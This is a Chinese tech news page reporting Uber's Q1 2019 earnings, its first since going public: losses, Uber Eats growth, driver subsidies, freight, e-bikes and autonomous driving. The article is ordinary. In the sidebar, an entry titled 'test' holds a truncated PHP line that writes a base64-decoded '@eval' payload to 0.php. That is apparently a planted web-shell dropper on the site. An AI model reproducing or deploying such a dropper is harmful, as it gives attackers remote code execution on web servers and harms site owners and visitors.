IT技术互动交流平台

Uber发布上市后第一份财报,外卖业务成心头爱

发布日期:2019-06-01 17:14:05
美东时间5月30日美股收盘后,Uber发布了截止到3月31日的2019财年第一季度财报,也是公司在上市以来的第一份财报。
从财报来看,第一季度Uber的净亏损为10.12亿美元。相比之下,去年同期的净利润为37.48亿美元(去年Uber分别将东南亚业务和俄罗斯业务出售给所在地的竞争对手,因此获得了额外收入)。根据上市前递交的招股书,Uber预计第一季度净亏损10亿美元,财报符合预期。
Q1总成本和支出为41.33亿美元,高于去年同期的30.62亿美元。收入30.99亿美元,照比去年同期25.84亿美元增长20%,但从2018年Q2、Q3和Q4 63%、38%、25%同比增长数据对比,增速放慢,Uber似乎在网约车的成本和支出上无法再节约。
从营收角度,Uber划分了两个运营部门,核心平台(Core Platform)和「其他赌注」(Other Bets),核心平台细划分为网约车(Ridesharing)、外卖配送(Uber Eats)、汽车解决方案(Vehicle Solution)和其他收入。「其他赌注」包括Uber Freight(货运)和New mobility(电动自行车和滑板车)。
相比网约车业务分别在收入和订单总额上9%和22%的增长,外卖配送服务Uber Eats在Q1则呈现了一副「喜人」的增长势头。
虽然Uber Eats的收入只有5.36亿美元,但是增速高达89%。Uber Eats的订单总额2.39亿,呈现了31%的增长。Khosrowshahi对投资人说,打车服务已经成为配送业务的巨大流量入口。Uber正在尝试增加打车和配送业务的「交叉」推广。Khosrowshahi表示,50%的配送用户不使用打车服务,所以配送业务来在为打车服务拉新。Uber只是在探索众多有效方式的早期阶段,打车业务和配送业务将会相辅相成。
配送市场上,Khosrowshahi坦然市场最终会整合起来,但是对于整合Khosrowshahi表示并不急切,如果从长远角度来看合并是对股东有利,Uber将会参与市场合并,但并不急于当下。
即便Uber看到配送业务的前景,但是仍然面临不小的压力。虽然Uber Eats达到了89%的增速,但是这一喜人的数字下,Uber花费了2.91亿美元的司机额外激励(Excess Driver incentives)和600万美元的老带新激励(Driver referrals),Uber Eats调整后净收入只有2.39亿美元。
此前Uber股价一路走跌反映出的是市场对于Uber盈利前景的不看好,但是Uber也丝毫不掩饰将继续烧钱圈地的野心。Uber在招股书中有这样一段话,「自成立以来,Uber亏损巨大,包括美国和其他主要市场。我们预计在可预见的未来,Uber的运营支出将大幅增加,可能无法实现盈利。」
财报会议上,CFO尼尔森·查伊(Nelson Chai)也再次重申,2019年将是「投资年」,「我们的投资仍然集中在全球平台扩张和长期产品和技术差异化上,但我们会毫不犹豫地投资捍卫我们在全球的市场地位。」
不过,在争夺市场份额之外,Uber也有了更加理性的判断。Khosrowshahi谈及了Lyft的财报会议,Lyft高管们在会议上表示,将在品牌方面展开更多的竞争。「我认为,在品牌和产品上展开竞争,可以说是一种比砸钱更加健康的竞争模式。」查伊也表示,Uber将削减对用户的补贴,营销费用占收入的比例将在第二季度下降。电话会议期间,Uber股价上涨约3%。
第一季度,月度活跃用户9300万,去年同期的月度活跃用户为7000万。总收入30.99亿美元,核心平台收入达29.54亿美元,同比增长16%,其中,网约车收入23.76亿美元,同比上涨9%,依然占据总收入的大头。「其他赌注」收入虽然只有1.45亿美元,但是增速高达263%。
电话会议上,Uber现任CEO Dara Khosrowshahi用了大篇幅描绘了「其他赌注」业务的蓝图。
包括了Uber Freight和New mobility在内的Q1订单总额同比增长230%,达到1.32亿美元。得益于Uber Freight在物流平台的建设上进展迅速,Q1增长超过200%。推出近两年以来,Uber Freight已经获得了一些企业级用户,比如美国最大连锁药店CVS健康公司、思科和喜力啤酒就在Q1加入了Uber Freight。
在New Mobility方面,Uber曾在2018年初收购了JUMP进军共享单车领域,改变了单一的出行服务方式。财报会议上,Khosrowshahi公布了JUMP硬件上的更新,新一代JUMP电动自行车提高了连接性,更耐用,并配有可更换电池。虽然没有给出确切的数据,但是Khosrowshahi表示随着电动车和滑板车业务在美国的持续扩张以及初次挺进欧洲市场,总订单量环比增长强劲,这也会是Q2的业务重心。
自2017年上任以来,Khosrowshahi不断在扩充Uber的出行版图,通过收购JUMP「扩充」网约车以外的出行工具。除此之外,Khosrowshahi还从上一任CEO手中接过自动驾驶部门。Uber的自动驾驶部门ATG在四月得到一笔来自丰田、Denso(电装)和软银的投资,交易将于7月完成,届时ATG的估值将达到72.5亿美元。据Khosrowshahi介绍,Uber内部仍然聚焦在自己网络上实现自动驾驶汽车的商业化,包括开发Uber自己的自动驾驶,软件和硬件堆栈,同时也让Uber网络做好部署合作伙伴的自动驾驶技术。
Uber如此看重自动驾驶技术的发展,很大程度上来源平台对于司机「烧钱式」的补贴。2019年Q1,司机额外激励(Excess Driver incentives)达到3.03亿,老带新激励(Driver referrals)为3500万,剔除这部分对司机的补贴,调整后净收入为27.61亿美元。目前阶段,针对Uber高额的补贴支出,大多数人都将希望寄予在Uber的自动驾驶业务上。但考虑到Uber自动驾驶业务过去两三年来一波三折的命运,技术和产品进步对司机补贴支出的缓解作用还微乎其微,亏损必然是Uber网约车业务相当一段时间内的常态。


延伸阅读:

Tag标签:
  • 专题推荐

  • test
  • <?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF...... 详细
About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规